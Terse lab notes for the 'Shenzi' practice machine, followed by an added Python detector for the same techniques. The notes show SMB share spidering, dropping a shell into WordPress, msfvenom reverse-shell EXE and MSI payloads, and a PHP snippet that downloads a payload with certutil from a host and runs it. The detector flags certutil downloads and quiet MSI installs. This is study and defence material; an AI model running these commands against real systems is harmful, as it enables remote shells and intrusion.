
Shenzi - smb -

Port 80: nothing there. FTP: anonymous login is not possible.

SMB has shares. Use the following to download everything:

netexec smb $target -u 'guest' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=. EXCLUDE_FILTER='PRINT$','IPC$','SYSVOL','NETLOGON'

WordPress tips

Log in as admin

  1. File upload -> upload a shell, then run it
  2. Edit template

-> Appearance -> Theme Editor -> 404.php -> replace it with a shell, then run it

Method 2

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.176 LPORT=4444 -f exe -o 64.exe

<?php
// Download the payload built by msfvenom above into C:\Windows\Temp
exec("certutil -urlcache -split -f http://192.168.45.176/64.exe C:\\Windows\\Temp\\64.exe");
// Run the downloaded payload
exec("C:\\Windows\\Temp\\64.exe");
?>

. .\PowerUp.ps1; Invoke-AllChecks

. .\PrivescCheck.ps1; Invoke-PrivescCheck

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.176 LPORT=4443 -a x64 --platform Windows -f msi -o rev.msi

msiexec /i C:\Users\shenzi\Desktop\rev.msi /qn

hint hostname info

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
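
A defensive counterpart to the certutil download and the quiet msiexec install noted above: this added example (not part of the original notes) flags those command-line patterns in process-creation logs. The event records, the parent paths, the 192.0.2.10 address and the rule names are constructed for illustration.

```python
# Constructed process-creation records (parent image, command line), shaped like
# Sysmon Event ID 1 or Security 4688 with command-line logging. Sample values only.
SAMPLE_EVENTS = [
    (r"C:\web\php\php-cgi.exe",
     r"cmd.exe /c certutil -urlcache -split -f http://192.0.2.10/64.exe C:\Windows\Temp\64.exe"),
    (r"C:\web\php\php-cgi.exe", r"cmd.exe /c C:\Windows\Temp\64.exe"),
    (r"C:\Windows\System32\cmd.exe", r"msiexec /i C:\Users\shenzi\Desktop\rev.msi /qn"),
    (r"C:\Windows\explorer.exe", r"msiexec /i C:\Installers\setup.msi"),
    (r"C:\Windows\System32\cmd.exe", r"certutil -hashfile C:\Installers\setup.msi SHA256"),
]

WEB_PARENTS = {"php.exe", "php-cgi.exe", "httpd.exe", "w3wp.exe", "nginx.exe"}
TEMP_DIRS = ("c:\\windows\\temp\\", "\\appdata\\local\\temp\\")


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect(parent_image, cmdline):
    """Return the names of the rules that a single process event matches."""
    tokens = cmdline.lower().split()  # simplification: ignores quoted paths with spaces
    # Look past a "cmd.exe /c" wrapper so the real child image is inspected.
    if len(tokens) > 2 and basename(tokens[0]) in ("cmd", "cmd.exe") and tokens[1] == "/c":
        tokens = tokens[2:]
    image = tokens[0] if tokens else ""
    args = tokens[1:]
    hits = []
    # A web server or PHP worker should not normally start other programs.
    if basename(parent_image) in WEB_PARENTS:
        hits.append("web_server_child")
    # certutil used as a downloader: -urlcache together with a URL argument.
    if (basename(image) in ("certutil", "certutil.exe")
            and any(a in ("-urlcache", "/urlcache") for a in args)
            and any(a.startswith(("http://", "https://")) for a in args)):
        hits.append("certutil_url_download")
    # A binary launched straight out of a temp directory.
    if image.endswith(".exe") and any(d in image for d in TEMP_DIRS):
        hits.append("exe_run_from_temp")
    # Silent MSI install of a package that sits in a user-writable path.
    if (basename(image) in ("msiexec", "msiexec.exe") and "/i" in args
            and any(a in ("/qn", "/quiet") for a in args)
            and any(a.endswith(".msi") and ("\\users\\" in a or "\\temp\\" in a) for a in args)):
        hits.append("msiexec_quiet_user_path")
    return hits


def scan(events):
    return [(cmd, detect(parent, cmd)) for parent, cmd in events]
```
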